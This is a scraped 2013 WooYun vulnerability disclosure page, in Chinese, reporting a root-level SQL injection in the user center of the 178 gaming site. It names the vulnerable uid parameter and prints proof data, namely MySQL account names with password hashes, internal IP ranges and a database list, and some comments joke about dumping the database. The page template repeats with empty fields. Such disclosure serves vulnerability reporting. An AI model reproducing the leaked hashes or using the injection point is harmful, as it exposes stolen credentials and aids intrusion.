178游戏网存在root权限SQL注射【可脱库】

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2013-022000

漏洞标题：178游戏网存在root权限SQL注射【可脱库】

漏洞作者： z@cx

提交时间：2013-04-17 08:31

修复时间：2013-06-01 08:31

公开时间：2013-06-01 08:31

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2013-04-17：细节已通知厂商并且等待厂商处理中
2013-04-17：厂商已经确认，细节仅向厂商公开
2013-04-27：细节向核心白帽子及相关领域专家公开
2013-05-07：细节向普通白帽子公开
2013-05-17：细节向实习白帽子公开
2013-06-01：细节向公众公开

简要描述：

178游戏网存在root权限SQL注射

详细说明：

存在问题的是用户中心。。。

http://i.178.com/?uid=355098

漏洞证明：

root:712bc5ee3d42fdc1:localhost
      root:712bc5ee3d42fdc1:127.0.0.1
      :712bc5ee3d42fdc1:localhost
      repl_user:4b1923db029b410c:192.168.20.%
      citeuserooo:70fbbe1837c3940e:192.168.20.%
      ranktest:10e55efc386fbf89:192.168.20.%
      sns_user:35cf510b3e94820e:192.168.20.%
      backup:4b1923db029b410c:192.168.20.65
      jsvc_user:542055bd26f15a5c:192.168.20.%
      cacti:142bb1aa1e6a5804:192.168.20.%
      rank_user:432ea4c87b20fbd2:192.168.20.%
      sns_repl:389e6960325eb291:192.168.20.%
      py_usr:2217c76d1d6a91d6:192.168.20.1
      temp_user:5155339f7d8b2d51:192.168.20.%

available databases [16]:
[*] game
[*] innodb
[*] information_schema
[*] mysql
[*] sns2
[*] sns_admin
[*] sns_album
[*] sns_api
[*] sns_bet
[*] sns_blog
[*] sns_cite
[*] sns_get_armory
[*] sns_group
[*] sns_gsrank
[*] temp_sns_cite
[*] test>

修复方案：

过滤

版权声明：转载请注明来源 z@cx@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：8

确认时间：2013-04-17 16:08

厂商回复：

非常感谢朋友们对178的支持。

漏洞评价：

2013-04-17 17:01 | xsser ( 普通白帽子 | Rank:254 漏洞数:17 | 当我又回首一切,这个世界会好吗?)

这个可以高
2013-06-01 08:50 | 偉哥 ( 实习白帽子 | Rank:67 漏洞数:11 | 哥是没帽子)

这厂商，漏洞Rank：8，下次直接拖库吧……
2013-06-01 08:57 | Aepl│恋爱 ( 实习白帽子 | Rank:45 漏洞数:15 | Forzen恋爱-不要做你的Guest 只想做的你adm...)

这厂商，漏洞Rank：8，下次直接拖库吧……
2013-06-01 09:13 | 小伟 ( 路人 | Rank:0 漏洞数:2 | )

这厂商，漏洞Rank：8，下次直接拖库吧……
2013-06-01 09:47 | her0ma ( 核心白帽子 | Rank:598 漏洞数:83 | 专注小厂商三十年！)

这厂商，漏洞Rank：8，下次直接拖库吧……
2013-06-01 10:08 | wefgod ( 普通白帽子 | Rank:1807 漏洞数:170 | 力不从心)

178的库，老的不是已经那个什么了……
2013-06-01 13:53 | Aepl│恋爱 ( 实习白帽子 | Rank:45 漏洞数:15 | Forzen恋爱-不要做你的Guest 只想做的你adm...)

@wefgod 脱离队伍拉出去弹JJ5分钟
2013-06-02 19:34 | wefgod ( 普通白帽子 | Rank:1807 漏洞数:170 | 力不从心)

@Aepl│恋爱我错了。
2014-06-11 23:17 | Cougar ( 实习白帽子 | Rank:69 漏洞数:19 | 不容易。)

可以脱毛裤裤根本没在这个站好不好

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2013-022000

漏洞标题：178游戏网存在root权限SQL注射【可脱库】

相关厂商：178游戏网

漏洞作者： z@cx

提交时间：2013-04-17 08:31

修复时间：2013-06-01 08:31

公开时间：2013-06-01 08:31

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 z@cx@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2013-022000

漏洞标题：178游戏网存在root权限SQL注射【可脱库】

相关厂商：178游戏网

漏洞作者： z@cx

提交时间：2013-04-17 08:31

修复时间：2013-06-01 08:31

公开时间：2013-06-01 08:31

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2013-022000"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 z@cx@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：